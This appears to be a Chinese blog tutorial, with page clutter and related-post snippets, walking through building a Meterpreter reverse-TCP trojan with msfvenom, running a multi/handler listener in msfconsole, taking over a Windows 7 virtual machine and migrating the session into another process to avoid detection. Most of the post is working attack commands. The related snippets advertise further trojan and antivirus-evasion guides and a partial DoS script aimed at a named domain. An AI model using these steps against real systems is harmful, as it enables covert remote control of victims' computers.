虚拟机中kali制作木马攻击脚本

最新推荐文章于 2025-02-22 22:01:29 发布

老弟你~~~

最新推荐文章于 2025-02-22 22:01:29 发布

阅读量583

点赞数 4

文章标签： linux

本文链接：https://blog.youkuaiyun.com/weixin_54636850/article/details/137717252

版权

本文详细描述了如何在关闭防火墙的Windows7虚拟机上，通过KaliLinux的KaliRoot环境，制作并执行Meterpreter反向TCP木马，以及在MSFConsole中设置和连接的过程，最后实现对目标主机的管理并隐藏连接。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

工具：kali window7（已关防火墙）虚拟机VMware Workstation

进入kali root模式

1、制作攻击脚本

msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx（kali的ip） lport=5027(端口) -f exe -o /home/kali/Desktop/文件名.exe

-p 设置payload

-f 设置木马的格式

-o 设置输出文件路径

2、将在桌面看到文件名.exe的文件，将此文件移到windows 7中

3、进入msfconsole，在攻击端开启服务，等待客户机连接

使用攻击模块，来生成相应的进程等待客户端连接

use exploit/multi/handler

设置所使用的payload（因为我们生成的木马程序是反向tcp的链接，所以这里也要采用同样是反向tcp链接的payload才能对应接收到待会的反向链接）

set payload windows/meterpreter/reverse_tcp

4、查看相应的参数

show options

5 设置相对应的参数

set lhost xxx.xxx.xxx.xxx(kaliip)

set lport 5027

6 发起连接

exploit

7 在Windows中双击打开木马程序即可链接成功

如连接不成功则改网段后再重复以上步骤重做一次

链接成功后即可以管理员身份接管主机

8 隐藏木马连接，为防止被发现，将运行的进程迁移到其他程序进程中

migrate 2104(不易被发现的进程号)

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

老弟你~~~

关注关注

4
点赞
踩
1

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结（二）

杨秀璋的专栏

05-18

1万+

这是作者网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您喜欢，一起进步。前文分享了肖老师（Seak）的分享，介绍恶意代码与APT攻击中的武器，包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统安全和软件安全的知识，接下来让我们回归网络安全，做做XSS跨站脚本攻击案例。这些题目来自Fox好友，在此感谢他。主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。希望您喜欢~

kali生成木马

Massimo__JAVA的博客

04-25

2307

攻击机：kali 192.168.116.128受害机：win7 192.168.116.124目标：使用kali。

1 条评论您还未登录，请先登录后发表或查看评论

网络安全技术新手入门:利用Kali Linux生成简单的远程控制木马

weixin_56154577的博客

01-08

7622

本文对木马的生成过程讲的比较详细，适合对网络安全技术感兴趣的小伙伴们，读完本文之后，读者可以对木马的形成、传播、对靶机的控制流程有一个逻辑性的理解

使用Kali Linux系统生成木马病毒并实现远程控制计算机

2401_84578953的博客

09-21

2540

木马生成木马病毒并实现远程控制计算机木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码通常有控制端和被控制端两个可执行程序。它通过将自身伪装吸引用户下载执行，向施种木马者提供打开被种者电脑的门户，使施种者可以任意毁坏、窃取被种者的文件，甚至还可以远程操控被种者的电脑。我将会详细的介绍使用Kali Linux系统生成木马，并用它远程控制一台处在外网的物理计算机。**使用工具**VMware Workstation Pro 16（虚拟机）Kali Linux 2021（系统）

Kali木马程序入侵windows

qq_58460014的博客

03-26

540

该软件执行时自动连接到我们的Kali，连接的端口为8888（端口可以任意），生成的文件为muma.exe，show options查看还需要设置什么参数，这里看到LHOST，和LPORT没有设置，LPORT和我们之前做好的木马程序返回的端口不一致所以要修改成我们的8888。这里我们的木马就已经生成好了，由于该木马没有做免杀操作，所以实验开始之前需要关闭自己的杀毒软件。本实验的目的是入侵被攻击者电脑获取shell，操作被攻击电脑。也是修改过来了，现在我们可以开始攻击了。使用msfconse工具。

网络安全--kali制作--手机kali--手机木马程序

2202_75858632的博客

01-16

1243

注意：这里演示的是安卓手机被植入木马程序，对方会拿木马来干嘛，该文章禁止传播，禁止去做非法用途，如果触犯法律一切后果自己承担。环境描述：攻击机--kali--Linux--IP：192.168.6.132电脑端夜神模拟器攻击机--手机安卓（Android）--IP：192.168.1.3实验安卓手机（Android）--IP：192.168.1.5我用电脑做的，用手机的Termux也可以，不会的去哔哩哔哩看看怎么用怎么安装查看主机IP然后制作木马这就显示制作好了因为是安卓的所以是apk我用的夜神模拟器我把制

【记录】kali制作绕过火绒检测的木马（仅通过MSF的方式）

最新发布

2403_87247171的博客

02-22

1149

最近在学习一些网安的知识和技术，并了解到Kali Linux这款操作系统，他是一款基于 Debian 的开源 Linux 发行版，专门用于数字取证和渗透测试。本教程只供大家学习探讨和交流，任何使用本教程内容去进行违法犯罪活动行为的一切后果，与本教程无关！注：本教程只供大家学习探讨和交流，任何使用本教程内容去进行违法犯罪活动行为的一切后果，与本教程无关！进入kali界面，随后输入kali的账号root和密码kali，进入kali的root操作界面。随后将这个IP填入刚刚的代码里，并回车运行，最后输入。

【kali】kali常见攻击手段

2403_83442903的博客

06-03

821

至此，后门植入成功！它通常被用来伪造邮件，进行钓鱼、社工等操作。如果想克隆指定的页面的话，就选择2站点克隆，当然，这个功能虽然强大，但是有的网站是无法克隆的，如果无法克隆，就选择3，自己制作一样的网站去钓鱼。我们将账号和密码都设为admin，点击登陆，发现有跳转到了真正的页面，也不会返回账号信息错误的界面，同时，kali也将我们输入的信息截获了，并在终端显示。通常是应用层攻击，攻击对象是网页，涉及的协议主要是HTTP，HTTPS，消耗的是服务器的CPU资源（通过请求大量调用CPU的资源，例如查询数据库）

Kali 下对安卓手机的攻击

m0_66524548的博客

01-29

1万+

写在前面：本文仅限学术交流，请勿用他人实践 Kali对安卓手机的攻击（渗透）我们首先需要确定本机IP 这很简单，对于Kali来说我们需要打开终端并键入 ifconfig 即可获取自己的IP，然后我们需要确定安卓手机也就是被攻击者的IP，只需键入 fping -g 本机IP地址/24 这时我们就能确定目标IP，这次教程主要围绕创建后门程序展开在终端中执行： # msfvenom -p android/meterpreter/reverse_tcp LHOST=目标IP LPORT=

kali使用Metasploit进行渗透攻击实验

ysm_zxc的博客

06-13

961

信息安全技术

js脚本攻击大全

07-18

js脚本攻击大全,各种JS脚本代码，防止js注入

Linux学习之Kali制作简单的Windows的木马，创建后门

weixin_42514162的博客

11-01

6291

Kali是一个强大系统，有很多的工具可以用来进行渗透。今天，介绍自己的初始的一个新手木马。首先，查看一下工具msfvenom的功能参数吧。 msfvenom 查看功能模块（超级多，要等一会，哈哈） msfvenom -l payloads 然后，使用工具msfvenom来生成后门木马，这个是专业的创建木马后门的工具。命令如下： msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.79.3 lport=2333 -f exe &

使用kali渗透工具msfvenom生成远控木马

m0_74981852的博客

06-04

3202

在杀毒软件中可以找回文件并信任改文件。右键复制到自己的电脑的一个位置，注意。1.打开kali终端>输入。2.1查看生成的后门文件。6.对目标主机进行攻击。运行之后，去目标主机。

利用kali自带的msfvenom工具生成远程控制软件(木马）

aici0819的博客

03-26

2197

2.生成一个简单的木马 3. 4. 5. 6.接下来生成的winx64muma.exe实际演示 7.将生成的winx64muma.exe在受害者机器上运行 8.在kali下输入msfconsole 9.接下来就开始连接转载于:https...

dos攻击脚本

Dou_Hua_Hua的博客

09-28

733

#!/usr/bin/env python import socket import time import threading #Pressure Test,ddos tool #--------------------------- MAX_CONN=20000 PORT=80 HOST="www.zhaihongyu.tech"#在双引号里输入对方IP或域名，要保证他联网了或开机了. PAGE="index.php" #-------------------

kali入门到入狱之生成木马程序的利用.

网络安全领域___专研者.

03-17

4741

当您忍不住点击一个（美女图片）或（帅哥图片）的时候，或者是您安装一个了来路不明的程序程序时，再或者是您随意点击了一个链接后，可能您的设备已经沦陷了.

跨站攻击脚本

weixin_34148340的博客

05-22

204

转载于:https://www.cnblogs.com/AtesetEnginner/p/10907035.html

虚拟机中 kali 拼不通windows主机

02-17

<think>好的，用户现在的问题是虚拟机中的Kali无法ping通Windows主机。之前用户问过同网段虚拟机之间的连通问题，现在可能是类似的问题，但这次是Kali和宿主机之间的通信。我需要先回顾之前的回答，看看哪些部分可以复用，同时考虑新的情况。首先，用户提到的是Kali虚拟机无法ping通Windows主机。这里的Windows主机可能是宿主机的系统，或者另一个虚拟机？需要确认。假设是宿主机，那么网络配置可能和之前的情况有所不同。比如，如果虚拟机使用的是NAT模式，宿主机和虚拟机之间通常可以通过特定的IP进行通信，但需要检查Windows防火墙设置，因为Windows默认可能阻止ICMP请求。接下来，我需要考虑用户可能没有提到的细节，比如虚拟化平台（VMware、VirtualBox等）的不同设置，网络模式的选择（NAT、桥接、仅主机等）。例如，在NAT模式下，宿主机和虚拟机的IP可能不在同一网段，而桥接模式则会让虚拟机像物理机一样在局域网中，这时候需要确保两者在同一子网。另外，Windows防火墙可能会阻止入站ping请求，这是常见的问题点。需要指导用户如何检查Windows的防火墙设置，允许ICMPv4入站。此外，还要考虑Kali的网络配置是否正确，比如是否分配到了正确的IP，子网掩码，网关等。可能还需要检查虚拟机的网络适配器是否启用，是否有驱动问题，或者虚拟网络编辑器的设置是否正确。例如，在VirtualBox中，如果使用NAT网络，可能需要检查端口转发规则是否设置正确，或者改用Host-Only网络，确保宿主机和虚拟机在同一私有网络中。此外，用户可能在之前的步骤中已经尝试过一些方法，但问题仍未解决，可能需要更深入的排查，比如使用arp命令检查邻居缓存，或者用tcpdump抓包分析ICMP请求是否被发送和接收，是否有响应被阻塞。最后，总结可能的原因和对应的解决步骤，分点列出，帮助用户逐步排查。需要确保语言简洁明了，步骤清晰，避免技术术语过多，同时覆盖各种可能性，比如防火墙、网络模式、IP配置、虚拟化平台设置等。</think>在虚拟机中的 Kali Linux 无法 ping 通宿主机（Windows），通常是由于 **网络模式配置、防火墙拦截、IP 地址冲突** 等原因导致。以下是详细的排查和解决方法： --- ### **一、检查网络模式配置** #### **1. 确认虚拟机的网络模式** - **常见模式**： - **NAT 模式**：虚拟机通过宿主机上网，但宿主机和虚拟机可能不在同一网段（默认可能无法互 ping）。 - **桥接模式（Bridged）**：虚拟机与宿主机处于同一物理网络，可以直接互 ping（需确保 IP 在同一网段）。 - **仅主机模式（Host-Only）**：宿主机和虚拟机通过私有网络通信（需手动配置 IP）。 - **解决方法**： 1. 将虚拟机网络模式改为 **桥接模式**（推荐）或 **Host-Only 模式**。 2. 重启虚拟机的网络服务或重启虚拟机。 #### **2. 检查 IP 地址是否在同一网段** - **在 Kali 中**： ```bash ip a # 查看 Kali 的 IP（如 192.168.1.10/24） ``` - **在 Windows 中**： ```cmd ipconfig # 查看 Windows 的 IP（如 192.168.1.2/24） ``` - 如果 Kali 和 Windows 的 IP **不在同一子网**，需手动配置 Kali 的 IP 或修改网络模式。 --- ### **二、检查 Windows 防火墙** Windows 默认会阻止外部设备的 ICMP（ping）请求，需手动放行： 1. **允许 ICMP 入站规则**： - 打开 Windows 的「控制面板」→「系统和安全」→「Windows Defender 防火墙」→「高级设置」。 - 在「入站规则」中找到 **“文件和打印机共享(回显请求 - ICMPv4-In)”**，启用该规则（选择“公用”和“专用”）。 2. **临时禁用防火墙测试**： ```cmd netsh advfirewall set allprofiles state off # 临时关闭防火墙（测试后重新启用） ``` --- ### **三、检查虚拟化平台设置** #### **1. VirtualBox 用户** - **检查网络适配器**： 1. 右键虚拟机 → 设置 → 网络 → 选择「桥接网卡」或「Host-Only 适配器」。 2. 在「全局设定」→「网络」中，确认 Host-Only 网络的 DHCP 是否启用。 #### **2. VMware 用户** - **检查虚拟网络编辑器**： 1. 打开 VMware → 编辑 → 虚拟网络编辑器。 2. 选择「桥接模式」并绑定到物理网卡，或配置「Host-Only 网络」的 IP 范围。 --- ### **四、验证网络连通性** 1. **从 Kali ping Windows**： ```bash ping <Windows_IP> ``` 2. **从 Windows ping Kali**： ```cmd ping <Kali_IP> ``` 3. **检查 ARP 表**： - 在 Kali 中查看是否学习到 Windows 的 MAC 地址： ```bash arp -n ``` --- ### **五、其他可能原因** 1. **IP 地址冲突**： - 确保 Kali 和 Windows 的 IP 未被其他设备占用。 2. **虚拟网卡驱动问题**： - 在 Windows 中更新虚拟化平台（如 VirtualBox/VMware）的驱动和扩展工具。 3. **Kali 内核限制**： - 检查 Kali 是否禁用了 ICMP 响应： ```bash sudo sysctl -w net.ipv4.icmp_echo_ignore_all=0 # 允许 ping ``` --- ### **六、抓包分析（终极排查）** 在 Kali 中抓包，观察 ICMP 请求是否发出或收到响应： ```bash sudo tcpdump -i eth0 icmp # 替换 eth0 为实际网卡名（如 ens33） ``` - 如果 Kali 发出请求但无响应，说明 Windows 未返回数据（检查防火墙）。 - 如果无请求发出，检查 Kali 的网络配置或路由表。 --- ### **总结步骤** 1. 将虚拟机网络模式改为 **桥接** 或 **Host-Only**。 2. 关闭 Windows 防火墙或放行 ICMP 规则。 3. 确认 Kali 和 Windows 的 IP 在同一子网。 4. 更新虚拟化平台和驱动。若仍无法解决，尝试重置虚拟网络配置或更换虚拟化平台（如 VMware 替代 VirtualBox）。